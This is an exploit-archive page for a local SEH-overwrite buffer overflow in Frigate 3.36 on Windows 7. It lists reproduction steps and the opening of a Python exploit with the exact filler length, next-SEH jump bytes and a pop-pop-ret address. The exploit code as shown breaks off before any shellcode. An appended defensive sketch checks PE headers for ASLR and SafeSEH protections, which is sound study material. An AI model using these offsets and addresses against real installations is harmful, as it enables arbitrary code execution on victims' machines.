Exploits / Vulnerability Discovered: 2020-05-04
Type: local
Platform: windows
This exploit / vulnerability, Frigate 3.36 buffer overflow (SEH), is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
# Exploit Title: Frigate 3.36 - Buffer Overflow (SEH)
# Exploit Author: Xenofon Vassilakopoulos
# Date: 2020-05-03
# Version: 3.36
# Vendor Homepage: http://www.Frigate3.com/
# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe
# Tested on: Windows 7 Professional SP1 x86
# Steps to reproduce :
# 1. generate the test.txt using this exploit
# 2. copy the contents of the test.txt to clipboard
# 3. open Frigate3 then go to Disk -> Find Computer
# 4. paste the contents to computer name
# 5. calculator will execute
import struct
filename = 'test.txt'
junk = "A" * 4112  # filler up to the SEH record
nseh = "\xeb\x1A\x90\x90"  # next-SEH field: short jump (EB 1A) followed by two NOPs
seh = struct.pack('L',0x40171c45) # pop esi # pop ebx # ret
nop = "\x90" * 18
junk2 = "\x71\x71\x90\x90"
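
Defender's check, added here as an example (not part of the original exploit and not the author's code): the hard-coded `pop/pop/ret` address in `seh` only works if it lies in a 32-bit module that loads at a fixed base and has no SafeSEH table. The sketch below reads those header fields from a PE image; the function names are hypothetical and the two sample headers are constructed for the demo, not taken from Frigate.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits (PE/COFF specification)
DYNAMIC_BASE, NX_COMPAT, NO_SEH = 0x0040, 0x0100, 0x0400
LOAD_CONFIG = 10  # data-directory index of the load configuration entry

def pe_mitigations(image: bytes) -> dict:
    """Read the header fields that govern SEH-overwrite exposure (PE32 only)."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("no MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    opt = e_lfanew + 24  # optional header follows signature + COFF header
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("not PE32 (SafeSEH is an x86-only mechanism)")
    (base,) = struct.unpack_from("<I", image, opt + 28)
    (chars,) = struct.unpack_from("<H", image, opt + 70)
    (ndirs,) = struct.unpack_from("<I", image, opt + 92)
    rva = size = 0
    if ndirs > LOAD_CONFIG:
        rva, size = struct.unpack_from("<II", image, opt + 96 + 8 * LOAD_CONFIG)
    return {"image_base": base, "aslr": bool(chars & DYNAMIC_BASE),
            "dep": bool(chars & NX_COMPAT), "no_seh": bool(chars & NO_SEH),
            # a SafeSEH handler table can only live in a load-config directory
            "load_config": bool(rva and size)}

def fixed_handler_address_usable(m: dict) -> bool:
    """True when a hard-coded handler address in this module stays valid:
    fixed base, handlers allowed, and no SafeSEH table possible."""
    return not (m["aslr"] or m["no_seh"] or m["load_config"])

def build_sample(chars: int, base: int, load_config=(0, 0)) -> bytes:
    """Constructed minimal PE32 header for the demo, not a real module."""
    img = bytearray(0x200)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)
    img[0x80:0x84] = b"PE\0\0"
    opt = 0x80 + 24
    struct.pack_into("<H", img, opt, 0x10B)
    struct.pack_into("<I", img, opt + 28, base)
    struct.pack_into("<H", img, opt + 70, chars)
    struct.pack_into("<I", img, opt + 92, 16)
    struct.pack_into("<II", img, opt + 96 + 8 * LOAD_CONFIG, *load_config)
    return bytes(img)

if __name__ == "__main__":
    for name, img in (("legacy", build_sample(0, 0x40000000)),
                      ("hardened", build_sample(0x0140, 0x10000000, (0x3000, 0x48)))):
        m = pe_mitigations(img)
        print(name, m, "exposed" if fixed_handler_address_usable(m) else "ok")
```

The load-config test is a coarse proxy: a module that has the directory may still carry an empty handler table, so confirm `SEHandlerCount` with a full PE parser before treating it as protected.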